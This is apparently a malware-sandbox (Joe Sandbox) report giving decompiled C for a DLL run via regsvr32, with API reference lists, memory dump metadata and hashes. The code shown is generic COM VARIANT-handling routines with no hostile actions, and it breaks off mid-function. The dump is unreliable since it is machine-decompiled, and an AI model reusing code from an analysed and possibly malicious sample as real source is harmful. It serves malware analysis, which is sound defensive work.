                                                                                                                				 *((intOrPtr*)(_t300 - 0x50)) = 0;
                                                                                                                				 *(_t300 - 0x4c) = 0;
                                                                                                                				 *((intOrPtr*)(_t300 - 0x48)) = 0;
                                                                                                                				 *(_t300 - 4) = 0;
                                                                                                                				E1003BB70(__edi, _t300 - 0x54, 0, 0x10);
                                                                                                                				_t302 = _t301 + 0xc;
                                                                                                                				if( *(_t300 + 0x18) != 0) {
                                                                                                                					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
                                                                                                                				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
                                                                                                                					 *((intOrPtr*)(_t300 - 0x48)) = 1;
                                                                                                                					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t300 - 0x68)) = 0x1005a004;
                                                                                                                				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
                                                                                                                				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
                                                                                                                				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
                                                                                                                				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
                                                                                                                				_t194 =  *(_t300 - 0x4c);
                                                                                                                				_t308 =  *(_t300 - 0x4c) - _t257;
                                                                                                                				 *(_t300 - 4) = 1;
                                                                                                                				_t293 = 4;
                                                                                                                				if( *(_t300 - 0x4c) == _t257) {
                                                                                                                					L37:
                                                                                                                					_t295 = 0;
                                                                                                                					E1002A12B(_t300 - 0x44);
                                                                                                                					if( *(_t300 + 0x10) != _t257) {
                                                                                                                						_t295 = _t300 - 0x44;
                                                                                                                					}
                                                                                                                					E1003BB70(_t293, _t300 - 0x88, _t257, 0x20);
                                                                                                                					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
                                                                                                                					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
                                                                                                                					_t289 = _t300 - 0x54;
                                                                                                                					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x1005fa04, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
                                                                                                                					E100165E7(_t257, _t300 - 0x68, _t293, _t295);
                                                                                                                					_t203 =  *(_t300 - 0x4c);
                                                                                                                					if(_t203 == _t257) {
                                                                                                                						L46:
                                                                                                                						_push( *((intOrPtr*)(_t300 - 0x54)));
                                                                                                                						E100160E7(_t257, _t293, _t295, _t319);
                                                                                                                						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
                                                                                                                						if( *(_t300 + 0xc) >= _t257) {
                                                                                                                							L61:
                                                                                                                							_t295 =  *(_t300 + 0x10);
                                                                                                                							if(_t295 == _t257) {
                                                                                                                								L76:
                                                                                                                								 *(_t300 - 4) = 0;
                                                                                                                								_t190 = E1001663E(_t300 - 0x68);
                                                                                                                								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
                                                                                                                								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									_push( *((intOrPtr*)(_t300 - 0x54)));
                                                                                                                									_t190 = E100160E7(_t257, _t293, _t295, __eflags);
                                                                                                                								}
                                                                                                                								goto L78;
                                                                                                                							}
                                                                                                                							if(_t295 == 0xc) {
                                                                                                                								L65:
                                                                                                                								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
                                                                                                                								__eflags = _t206 - 0x13;
                                                                                                                								if(_t206 > 0x13) {
                                                                                                                									goto L76;
                                                                                                                								}
                                                                                                                								switch( *((intOrPtr*)(_t206 * 4 +  &M10016F7F))) {
                                                                                                                									case 0:
                                                                                                                										__eax =  *(__ebp + 0x14);
                                                                                                                										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                										goto L76;
                                                                                                                									case 1:
                                                                                                                										__eax =  *(__ebp + 0x14);
                                                                                                                										__ecx =  *(__ebp - 0x3c);
                                                                                                                										 *( *(__ebp + 0x14)) = __ecx;
                                                                                                                										goto L76;
                                                                                                                									case 2:
                                                                                                                										__eax =  *(__ebp + 0x14);
                                                                                                                										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                										goto L76;
                                                                                                                									case 3:
                                                                                                                										__eax =  *(__ebp + 0x14);
                                                                                                                										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                										goto L76;
                                                                                                                									case 4:
                                                                                                                										__ecx =  *(__ebp - 0x3c);
                                                                                                                										__eax =  *(__ebp + 0x14);
                                                                                                                										 *__eax =  *(__ebp - 0x3c);
                                                                                                                										__ecx =  *(__ebp - 0x38);
                                                                                                                										 *(__eax + 4) = __ecx;
                                                                                                                										goto L76;
                                                                                                                									case 5:
                                                                                                                										__eax = E1002C671(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
                                                                                                                										_push( *(__ebp - 0x3c));
                                                                                                                										__imp__#6();
                                                                                                                										goto L76;
                                                                                                                									case 6:
                                                                                                                										__ecx =  *(__ebp + 0x14);
                                                                                                                										__eax = 0;
                                                                                                                										__eflags =  *(__ebp - 0x3c) - __bx;
                                                                                                                										__eax = 0 | __eflags != 0x00000000;
                                                                                                                										 *__ecx = __eflags != 0;
                                                                                                                										goto L76;
                                                                                                                									case 7:
                                                                                                                										__edi =  *(__ebp + 0x14);
                                                                                                                										__esi = __ebp - 0x44;
                                                                                                                										asm("movsd");
                                                                                                                										asm("movsd");
                                                                                                                										asm("movsd");
                                                                                                                										asm("movsd");
                                                                                                                										__ebx = 0;
                                                                                                                										goto L76;
                                                                                                                									case 8:
                                                                                                                										goto L76;
                                                                                                                									case 9:
                                                                                                                										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
                                                                                                                										goto L76;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							_t208 = _t300 - 0x44;
                                                                                                                							__imp__#12(_t208, _t208, _t257, _t295);
                                                                                                                							_t293 = _t208;
                                                                                                                							_t321 = _t293 - _t257;
                                                                                                                							if(_t293 >= _t257) {
                                                                                                                								goto L65;
                                                                                                                							}
                                                                                                                							__imp__#9(_t300 - 0x44);
                                                                                                                							_push(_t293);
                                                                                                                							L49:
                                                                                                                							E10017077(_t257, _t293, _t295, _t321);
                                                                                                                							L50:
                                                                                                                							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
                                                                                                                							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
                                                                                                                								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
                                                                                                                							}
                                                                                                                							_t211 = E100160BC(_t322, 0x20);
                                                                                                                							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
                                                                                                                							_t323 = _t211 - _t257;
                                                                                                                							 *(_t300 - 4) = 4;
                                                                                                                							if(_t211 != _t257) {
                                                                                                                								_push( *((intOrPtr*)(_t300 - 0x88)));
                                                                                                                								_push(_t257);
                                                                                                                								_push(_t257);
                                                                                                                								_t257 = E1002CE34(_t257, _t211, _t289, _t293, _t295, _t323);
                                                                                                                							}
                                                                                                                							_push( *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                							_t293 = __imp__#7;
                                                                                                                							 *(_t300 - 4) = 1;
                                                                                                                							if( *_t293() != 0) {
                                                                                                                								_t139 = _t257 + 0x18; // 0x18
                                                                                                                								E1001688F(_t139,  *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                							}
                                                                                                                							_t296 = __imp__#6;
                                                                                                                							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                							_push( *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                							if( *_t293() != 0) {
                                                                                                                								_t143 = _t257 + 0xc; // 0xc
                                                                                                                								E1001688F(_t143,  *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                							}
                                                                                                                							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                							_push( *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                							if( *_t293() != 0) {
                                                                                                                								_t147 = _t257 + 0x14; // 0x14
                                                                                                                								E1001688F(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                							}
                                                                                                                							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
                                                                                                                							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
                                                                                                                							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
                                                                                                                							E1003D2F0(_t300 + 0x14, 0x10065010);
                                                                                                                							goto L61;
                                                                                                                						}
                                                                                                                						__imp__#9(_t300 - 0x44);
                                                                                                                						_t321 =  *(_t300 + 0xc) - 0x80020009;
                                                                                                                						if( *(_t300 + 0xc) == 0x80020009) {
                                                                                                                							goto L50;
                                                                                                                						}
                                                                                                                						_push( *(_t300 + 0xc));
                                                                                                                						goto L49;
                                                                                                                					} else {
                                                                                                                						_t295 =  *(_t300 + 0x18);
                                                                                                                						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
                                                                                                                						while(1) {
                                                                                                                							_t319 =  *_t295;
                                                                                                                							if( *_t295 == 0) {
                                                                                                                								goto L46;
                                                                                                                							}
                                                                                                                							_t230 =  *_t295;
                                                                                                                							__eflags = _t230 - 8;
                                                                                                                							if(_t230 == 8) {
                                                                                                                								L43:
                                                                                                                								__imp__#9(_t293);
                                                                                                                								L44:
                                                                                                                								_t293 = _t293 - 0x10;
                                                                                                                								_t295 =  &(_t295[1]);
                                                                                                                								__eflags = _t295;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							__eflags = _t230 - 0xe;
                                                                                                                							if(_t230 != 0xe) {
                                                                                                                								goto L44;
                                                                                                                							}
                                                                                                                							goto L43;
                                                                                                                						}
                                                                                                                						goto L46;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t290 = 0x10;
                                                                                                                					_t297 = E100160BC(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
                                                                                                                					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
                                                                                                                					E1003BB70(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
                                                                                                                					_t236 =  *(_t300 + 0x18);
                                                                                                                					_t277 =  *(_t300 - 0x4c) << 4;
                                                                                                                					_t302 = _t302 + 0x10;
                                                                                                                					_t36 = _t277 - 0x10; // -16
                                                                                                                					_t278 = _t297 + _t36;
                                                                                                                					 *(_t300 - 0x14) = _t236;
                                                                                                                					 *(_t300 - 0x10) = _t278;
                                                                                                                					if( *_t236 == 0) {
                                                                                                                						goto L37;
                                                                                                                					}
                                                                                                                					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
                                                                                                                					_t299 =  &(_t278[4]);
                                                                                                                					_t258 = _t237 - 4;
                                                                                                                					 *(_t300 - 0x1c) = _t299;
                                                                                                                					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
                                                                                                                					do {
                                                                                                                						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
                                                                                                                						_t279 =  *(_t300 - 0x10);
                                                                                                                						 *_t279 = _t240;
                                                                                                                						if((_t240 & 0x00000040) != 0) {
                                                                                                                							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
                                                                                                                						}
                                                                                                                						_t241 =  *_t279 & 0x0000ffff;
                                                                                                                						_t313 = _t241 - 0x4002;
                                                                                                                						if(_t313 > 0) {
                                                                                                                							_t242 = _t241 - 0x4003;
                                                                                                                							__eflags = _t242 - 0x12;
                                                                                                                							if(__eflags > 0) {
                                                                                                                								goto L35;
                                                                                                                							}
                                                                                                                							switch( *((intOrPtr*)(_t242 * 4 +  &M10016F33))) {
                                                                                                                								case 0:
                                                                                                                									goto L34;
                                                                                                                								case 1:
                                                                                                                									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                									_t258 = _t258 + _t293;
                                                                                                                									_t244 =  *_t258;
                                                                                                                									asm("sbb ecx, ecx");
                                                                                                                									 *_t244 =  ~( *_t244) & 0x0000ffff;
                                                                                                                									 *_t299 = _t244;
                                                                                                                									_t245 = E10016255(_t300 - 0x34, _t244, _t244, 0);
                                                                                                                									 *(_t300 - 4) = 3;
                                                                                                                									E100167E7(_t258, _t300 - 0x68, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
                                                                                                                									__eflags =  *(_t300 - 0x2c);
                                                                                                                									 *(_t300 - 4) = 1;
                                                                                                                									if(__eflags != 0) {
                                                                                                                										_push( *((intOrPtr*)(_t300 - 0x34)));
                                                                                                                										E100160E7(_t258, _t293, _t299, __eflags);
                                                                                                                									}
                                                                                                                									goto L35;
                                                                                                                								case 2:
                                                                                                                									goto L35;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							if(_t313 == 0) {
                                                                                                                								L34:
                                                                                                                								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                								_t258 = _t258 + _t293;
                                                                                                                								__eflags = _t258;
                                                                                                                								 *_t299 =  *_t258;
                                                                                                                								goto L35;
                                                                                                                							}
                                                                                                                							_t250 = _t241;
                                                                                                                							if(_t250 > 0x13) {
                                                                                                                								goto L35;
                                                                                                                							}
                                                                                                                							switch( *((intOrPtr*)(_t250 * 4 +  &M10016EE3))) {
                                                                                                                								case 0:
                                                                                                                									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                									__ebx = __ebx + __edi;
                                                                                                                									__ax =  *__ebx;
                                                                                                                									goto L28;
                                                                                                                								case 1:
                                                                                                                									goto L34;
                                                                                                                								case 2:
                                                                                                                									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                                                                									__eax =  *(__ebp + 0x1c);
                                                                                                                									__ebx =  &(__ebx[2]);
                                                                                                                									 *__esi =  *( *(__ebp + 0x1c));
                                                                                                                									goto L35;
                                                                                                                								case 3:
                                                                                                                									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                                                                									__eax =  *(__ebp + 0x1c);
                                                                                                                									__ebx =  &(__ebx[2]);
                                                                                                                									 *__esi =  *( *(__ebp + 0x1c));
                                                                                                                									goto L35;
                                                                                                                								case 4:
                                                                                                                									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                									__ebx = __ebx + __edi;
                                                                                                                									__eax =  *__ebx;
                                                                                                                									goto L17;
                                                                                                                								case 5:
                                                                                                                									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                									__ebx = __ebx + __edi;
                                                                                                                									__eax =  *__ebx;
                                                                                                                									_push(__eax);
                                                                                                                									 *(__ebp - 0x1c) = __eax;
                                                                                                                									__imp__#2();
                                                                                                                									__eflags =  *(__ebp - 0x1c);
                                                                                                                									 *__esi = __eax;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L35;
                                                                                                                									}
                                                                                                                									__eflags = __eax;
                                                                                                                									if(__eflags != 0) {
                                                                                                                										goto L35;
                                                                                                                									}
                                                                                                                									goto L23;
                                                                                                                								case 6:
                                                                                                                									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                									__ebx = __ebx + __edi;
                                                                                                                									 *__ebx =  ~( *__ebx);
                                                                                                                									asm("sbb eax, eax");
                                                                                                                									L28:
                                                                                                                									 *__esi = __ax;
                                                                                                                									goto L35;
                                                                                                                								case 7:
                                                                                                                									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
                                                                                                                									__edi =  *(__ebp - 0x10);
                                                                                                                									__ebx =  &(__ebx[1]);
                                                                                                                									__esi =  *__ebx;
                                                                                                                									asm("movsd");
                                                                                                                									asm("movsd");
                                                                                                                									asm("movsd");
                                                                                                                									asm("movsd");
                                                                                                                									__esi =  *(__ebp - 0x1c);
                                                                                                                									_push(4);
                                                                                                                									_pop(__edi);
                                                                                                                									goto L35;
                                                                                                                								case 8:
                                                                                                                									L24:
                                                                                                                									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                									__ebx = __ebx + __edi;
                                                                                                                									__eax =  *__ebx;
                                                                                                                									_push(__eax);
                                                                                                                									__ecx = __ebp - 0x18;
                                                                                                                									 *(__ebp - 0x1c) = __eax;
                                                                                                                									__eax = E100169AB(__ebx, __ecx, __edi, __esi, __eflags);
                                                                                                                									_push( *(__ebp - 0x18));
                                                                                                                									 *((char*)(__ebp - 4)) = 2;
                                                                                                                									__imp__#2();
                                                                                                                									__eflags =  *(__ebp - 0x1c);
                                                                                                                									 *__esi = __eax;
                                                                                                                									if( *(__ebp - 0x1c) == 0) {
                                                                                                                										L26:
                                                                                                                										__ecx =  *(__ebp - 0x18);
                                                                                                                										__eax =  *(__ebp - 0x10);
                                                                                                                										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
                                                                                                                										 *( *(__ebp - 0x10)) = 8;
                                                                                                                										 *((char*)(__ebp - 4)) = 1;
                                                                                                                										__eax = E10001020(__ecx, __edx);
                                                                                                                										goto L35;
                                                                                                                									}
                                                                                                                									__eflags = __eax;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										L23:
                                                                                                                										__eax = E1001726A(__ebx, __ecx, __edi, __esi, __eflags);
                                                                                                                										goto L24;
                                                                                                                									}
                                                                                                                									goto L26;
                                                                                                                								case 9:
                                                                                                                									goto L35;
                                                                                                                								case 0xa:
                                                                                                                									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                									_t258 = _t258 + _t293;
                                                                                                                									 *_t299 =  *_t258;
                                                                                                                									goto L35;
                                                                                                                								case 0xb:
                                                                                                                									__eax =  *(__ebp + 0x1c);
                                                                                                                									__eax =  *(__ebp + 0x1c) + 8;
                                                                                                                									 *(__ebp + 0x1c) = __eax;
                                                                                                                									__ebx =  &(__ebx[2]);
                                                                                                                									__eflags = __ebx;
                                                                                                                									L17:
                                                                                                                									__ecx =  *__eax;
                                                                                                                									 *__esi = __ecx;
                                                                                                                									 *(__esi + 4) = __eax;
                                                                                                                									goto L35;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L35:
                                                                                                                						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
                                                                                                                						_t299 = _t299 - 0x10;
                                                                                                                						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
                                                                                                                						 *(_t300 - 0x1c) = _t299;
                                                                                                                					} while ( *( *(_t300 - 0x14)) != 0);
                                                                                                                					_t257 = 0;
                                                                                                                					goto L37;
                                                                                                                				}
                                                                                                                			}































                                                                                                                0x10016dc0
                                                                                                                0x10016dc8
                                                                                                                0x10016dca
                                                                                                                0x10016dd1
                                                                                                                0x10016dd6
                                                                                                                0x10016dd9
                                                                                                                0x10016dd9
                                                                                                                0x10016de1
                                                                                                                0x10016de6
                                                                                                                0x10016dec
                                                                                                                0x10016df8
                                                                                                                0x10016dfb
                                                                                                                0x00000000
                                                                                                                0x10016dfb
                                                                                                                0x10016d35
                                                                                                                0x10016d3b
                                                                                                                0x10016d42
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016d44
                                                                                                                0x00000000
                                                                                                                0x10016cf3
                                                                                                                0x10016cf6
                                                                                                                0x10016cfc
                                                                                                                0x10016d17
                                                                                                                0x10016d17
                                                                                                                0x10016d1a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016d02
                                                                                                                0x10016d04
                                                                                                                0x10016d06
                                                                                                                0x10016d0c
                                                                                                                0x10016d0d
                                                                                                                0x10016d13
                                                                                                                0x10016d13
                                                                                                                0x10016d16
                                                                                                                0x10016d16
                                                                                                                0x00000000
                                                                                                                0x10016d16
                                                                                                                0x10016d08
                                                                                                                0x10016d0a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016d0a
                                                                                                                0x00000000
                                                                                                                0x10016d17
                                                                                                                0x10016a76
                                                                                                                0x10016a7a
                                                                                                                0x10016a8a
                                                                                                                0x10016a95
                                                                                                                0x10016a98
                                                                                                                0x10016aa0
                                                                                                                0x10016aa3
                                                                                                                0x10016aa6
                                                                                                                0x10016aac
                                                                                                                0x10016aac
                                                                                                                0x10016ab0
                                                                                                                0x10016ab3
                                                                                                                0x10016ab6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016abc
                                                                                                                0x10016ac1
                                                                                                                0x10016ac4
                                                                                                                0x10016aca
                                                                                                                0x10016acd
                                                                                                                0x10016ad0
                                                                                                                0x10016ad3
                                                                                                                0x10016ad9
                                                                                                                0x10016adc
                                                                                                                0x10016adf
                                                                                                                0x10016ae9
                                                                                                                0x10016ae9
                                                                                                                0x10016aec
                                                                                                                0x10016af4
                                                                                                                0x10016af6
                                                                                                                0x10016c13
                                                                                                                0x10016c18
                                                                                                                0x10016c1b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016c1d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016c24
                                                                                                                0x10016c27
                                                                                                                0x10016c29
                                                                                                                0x10016c2f
                                                                                                                0x10016c39
                                                                                                                0x10016c40
                                                                                                                0x10016c42
                                                                                                                0x10016c4e
                                                                                                                0x10016c52
                                                                                                                0x10016c57
                                                                                                                0x10016c5b
                                                                                                                0x10016c5f
                                                                                                                0x10016c61
                                                                                                                0x10016c64
                                                                                                                0x10016c69
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016afc
                                                                                                                0x10016afc
                                                                                                                0x10016c6c
                                                                                                                0x10016c6c
                                                                                                                0x10016c6f
                                                                                                                0x10016c6f
                                                                                                                0x10016c73
                                                                                                                0x00000000
                                                                                                                0x10016c73
                                                                                                                0x10016b03
                                                                                                                0x10016b07
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016b0d
                                                                                                                0x00000000
                                                                                                                0x10016b22
                                                                                                                0x10016b25
                                                                                                                0x10016b27
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016b4a
                                                                                                                0x10016b4e
                                                                                                                0x10016b53
                                                                                                                0x10016b56
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016b5d
                                                                                                                0x10016b61
                                                                                                                0x10016b66
                                                                                                                0x10016b69
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016b70
                                                                                                                0x10016b73
                                                                                                                0x10016b75
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016b79
                                                                                                                0x10016b7c
                                                                                                                0x10016b7e
                                                                                                                0x10016b80
                                                                                                                0x10016b81
                                                                                                                0x10016b84
                                                                                                                0x10016b8a
                                                                                                                0x10016b8e
                                                                                                                0x10016b90
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016b96
                                                                                                                0x10016b98
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016beb
                                                                                                                0x10016bee
                                                                                                                0x10016bf2
                                                                                                                0x10016bf4
                                                                                                                0x10016bf6
                                                                                                                0x10016bf6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016bfb
                                                                                                                0x10016bff
                                                                                                                0x10016c02
                                                                                                                0x10016c05
                                                                                                                0x10016c07
                                                                                                                0x10016c08
                                                                                                                0x10016c09
                                                                                                                0x10016c0a
                                                                                                                0x10016c0b
                                                                                                                0x10016c0e
                                                                                                                0x10016c10
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016ba3
                                                                                                                0x10016ba3
                                                                                                                0x10016ba6
                                                                                                                0x10016ba8
                                                                                                                0x10016baa
                                                                                                                0x10016bab
                                                                                                                0x10016bae
                                                                                                                0x10016bb1
                                                                                                                0x10016bb6
                                                                                                                0x10016bb9
                                                                                                                0x10016bbd
                                                                                                                0x10016bc3
                                                                                                                0x10016bc7
                                                                                                                0x10016bc9
                                                                                                                0x10016bcf
                                                                                                                0x10016bcf
                                                                                                                0x10016bd2
                                                                                                                0x10016bd5
                                                                                                                0x10016bd8
                                                                                                                0x10016bdd
                                                                                                                0x10016be1
                                                                                                                0x00000000
                                                                                                                0x10016be1
                                                                                                                0x10016bcb
                                                                                                                0x10016bcd
                                                                                                                0x10016b9e
                                                                                                                0x10016b9e
                                                                                                                0x00000000
                                                                                                                0x10016b9e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016b14
                                                                                                                0x10016b17
                                                                                                                0x10016b1b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016b2f
                                                                                                                0x10016b32
                                                                                                                0x10016b35
                                                                                                                0x10016b38
                                                                                                                0x10016b38
                                                                                                                0x10016b3b
                                                                                                                0x10016b3b
                                                                                                                0x10016b3d
                                                                                                                0x10016b42
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016b0d
                                                                                                                0x10016c75
                                                                                                                0x10016c75
                                                                                                                0x10016c79
                                                                                                                0x10016c7c
                                                                                                                0x10016c85
                                                                                                                0x10016c85
                                                                                                                0x10016c8e
                                                                                                                0x00000000
                                                                                                                0x10016c8e

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100169F6
                                                                                                                • _memset.LIBCMT ref: 10016A1E
                                                                                                                • lstrlenA.KERNEL32(?,?,?,10058618,00000000,10056948,00000000), ref: 10016A2E
                                                                                                                • _memset.LIBCMT ref: 10016A98
                                                                                                                • _memset.LIBCMT ref: 10016CAE
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10016D0D
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10016D35
                                                                                                                • SysStringLen.OLEAUT32(?), ref: 10016D8F
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 10016DAF
                                                                                                                • SysStringLen.OLEAUT32(?), ref: 10016DB4
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 10016DC8
                                                                                                                • SysStringLen.OLEAUT32(?), ref: 10016DCD
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 10016DE1
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10016DFB
                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 10016E19
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10016E29
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4128688680-0
                                                                                                                • Opcode ID: 4ce08456f36365bcf7ba3eaf88c4784b5c5e83f4cc52fa4ffad0f5750cffa731
                                                                                                                • Instruction ID: 319c792b0ddf46419fd0bf15a8d232bbccb348bd983ffdde71d77faf5b4a9c61
                                                                                                                • Opcode Fuzzy Hash: 4ce08456f36365bcf7ba3eaf88c4784b5c5e83f4cc52fa4ffad0f5750cffa731
                                                                                                                • Instruction Fuzzy Hash: A6F177B5900249DFDF10CFA8DC80AAEBBB4FF09300F508469E951AB2A0DB35DA95CF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E10010570(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                				int _v4;
                                                                                                                				char _v12;
                                                                                                                				char _v16;
                                                                                                                				char _v24;
                                                                                                                				char _v28;
                                                                                                                				char _v44;
                                                                                                                				long* _v80;
                                                                                                                				long* _v84;
                                                                                                                				long* _v88;
                                                                                                                				signed int _v100;
                                                                                                                				intOrPtr _v104;
                                                                                                                				char _v108;
                                                                                                                				char _v112;
                                                                                                                				struct HWND__* _v124;
                                                                                                                				intOrPtr _v136;
                                                                                                                				char _v140;
                                                                                                                				char _v148;
                                                                                                                				char _v156;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t134;
                                                                                                                				void* _t138;
                                                                                                                				intOrPtr* _t141;
                                                                                                                				intOrPtr* _t145;
                                                                                                                				void* _t151;
                                                                                                                				long _t152;
                                                                                                                				intOrPtr* _t158;
                                                                                                                				intOrPtr* _t172;
                                                                                                                				void* _t173;
                                                                                                                				signed int _t176;
                                                                                                                				void* _t182;
                                                                                                                				long _t196;
                                                                                                                				void* _t198;
                                                                                                                				intOrPtr _t203;
                                                                                                                				intOrPtr* _t207;
                                                                                                                				long* _t208;
                                                                                                                				long* _t209;
